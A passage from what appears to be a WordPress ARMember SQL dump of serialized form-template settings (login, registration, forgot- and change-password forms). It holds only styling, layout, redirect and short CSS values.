Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"150\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:80:{s:11:\"form_layout\";s:7:\"rounded\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:3:\"red\";s:16:\"lable_font_color\";s:7:\"#1a2538\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#dbdbdb\";s:17:\"field_focus_color\";s:7:\"#a38ea3\";s:17:\"button_back_color\";s:7:\"#dd2476\";s:26:\"button_back_color_gradient\";s:7:\"#ff512f\";s:18:\"button_hover_color\";s:7:\"#dd2476\";s:27:\"button_hover_color_gradient\";s:7:\"#ff512f\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#e65e80\";s:24:\"register_link_font_color\";s:7:\"#e65e80\";s:21:\"form_title_font_color\";s:7:\"#dd2476\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"2\";s:19:\"field_border_radius\";s:2:\"40\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"180\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"48\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"50\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:204:\".arm-df__form-field-wrap_rememberme{margin-top:-10px !important;margin-left:15px !important;}.arm-df__form-control-submit-btn:hover{border:0px; !important;}.arm-df__heading{margin-bottom:40px !important;}\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(11,'Forgot Password','Forgot Password','template','template-forgot-password-3',1,'Template 3',-3,1,3,'a:19:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:14:\"CREATE ACCOUNT\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"150\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:80:{s:11:\"form_layout\";s:7:\"rounded\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:3:\"red\";s:16:\"lable_font_color\";s:7:\"#1a2538\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#dbdbdb\";s:17:\"field_focus_color\";s:7:\"#a38ea3\";s:17:\"button_back_color\";s:7:\"#dd2476\";s:26:\"button_back_color_gradient\";s:7:\"#ff512f\";s:18:\"button_hover_color\";s:7:\"#dd2476\";s:27:\"button_hover_color_gradient\";s:7:\"#ff512f\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#e65e80\";s:24:\"register_link_font_color\";s:7:\"#e65e80\";s:21:\"form_title_font_color\";s:7:\"#dd2476\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"2\";s:19:\"field_border_radius\";s:2:\"40\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"180\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"48\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"50\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:204:\".arm-df__form-field-wrap_rememberme{margin-top:-10px !important;margin-left:15px !important;}.arm-df__form-control-submit-btn:hover{border:0px; !important;}.arm-df__heading{margin-bottom:40px !important;}\";s:11:\"description\";s:50:\"Please enter your email address or username below.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(12,'Change Password','Change Password','template','template-change-password-3',1,'Template 3',-3,1,3,'a:20:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:14:\"CREATE ACCOUNT\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"150\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:80:{s:11:\"form_layout\";s:7:\"rounded\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:3:\"red\";s:16:\"lable_font_color\";s:7:\"#1a2538\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#dbdbdb\";s:17:\"field_focus_color\";s:7:\"#a38ea3\";s:17:\"button_back_color\";s:7:\"#dd2476\";s:26:\"button_back_color_gradient\";s:7:\"#ff512f\";s:18:\"button_hover_color\";s:7:\"#dd2476\";s:27:\"button_hover_color_gradient\";s:7:\"#ff512f\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#e65e80\";s:24:\"register_link_font_color\";s:7:\"#e65e80\";s:21:\"form_title_font_color\";s:7:\"#dd2476\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"2\";s:19:\"field_border_radius\";s:2:\"40\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"180\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"48\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"50\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:204:\".arm-df__form-field-wrap_rememberme{margin-top:-10px !important;margin-left:15px !important;}.arm-df__form-control-submit-btn:hover{border:0px; !important;}.arm-df__heading{margin-bottom:40px !important;}\";s:11:\"description\";s:50:\"Please enter your email address or username below.\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(13,'Template 4','Please Signup','template','template-registration-4',1,'Template 4',0,1,4,'a:7:{s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:10:\"auto_login\";s:1:\"1\";s:5:\"style\";a:79:{s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:19:\"form_padding_bottom\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:5:\"green\";s:16:\"lable_font_color\";s:7:\"#131a15\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#e6e6e6\";s:17:\"field_focus_color\";s:7:\"#27c24c\";s:14:\"field_bg_color\";s:7:\"#f0f0f0\";s:17:\"button_back_color\";s:7:\"#27c24c\";s:17:\"button_font_color\";s:7:\"#fcfcfc\";s:18:\"button_hover_color\";s:7:\"#29cc50\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#131a15\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#27c24c\";s:24:\"register_link_font_color\";s:7:\"#27c24c\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:14:\"reverse_border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:27:\"registration_link_type_page\";i:2043;s:30:\"forgot_password_link_type_page\";i:2045;}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(14,'Please Login','Please Login','template','template-login-4',1,'Template 4',-4,1,4,'a:18:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:11:\"Create User\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"80\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"80\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:5:\"green\";s:16:\"lable_font_color\";s:7:\"#131a15\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#e6e6e6\";s:17:\"field_focus_color\";s:7:\"#27c24c\";s:14:\"field_bg_color\";s:7:\"#f0f0f0\";s:17:\"button_back_color\";s:7:\"#27c24c\";s:17:\"button_font_color\";s:7:\"#fcfcfc\";s:18:\"button_hover_color\";s:7:\"#29cc50\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#131a15\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#27c24c\";s:24:\"register_link_font_color\";s:7:\"#27c24c\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:6:\"center\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:14:\"reverse_border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:109:\".arm_editor_form_fileds_wrapper .arm_login_links_wrapper, .arm_login_links_wrapper{ width:auto !important ; }\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(15,'Forgot Password','Forgot Password','template','template-forgot-password-4',1,'Template 4',-4,1,4,'a:19:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"0\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:11:\"Create User\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:3:\"-40\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"280\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:84:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"iconic\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"80\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"80\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:5:\"green\";s:16:\"lable_font_color\";s:7:\"#131a15\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#e6e6e6\";s:17:\"field_focus_color\";s:7:\"#27c24c\";s:14:\"field_bg_color\";s:7:\"#f0f0f0\";s:17:\"button_back_color\";s:7:\"#27c24c\";s:17:\"button_font_color\";s:7:\"#fcfcfc\";s:18:\"button_hover_color\";s:7:\"#29cc50\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#131a15\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:21:\"login_link_font_color\";s:7:\"#27c24c\";s:24:\"register_link_font_color\";s:7:\"#27c24c\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"6\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:6:\"center\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"44\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:14:\"reverse_border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:109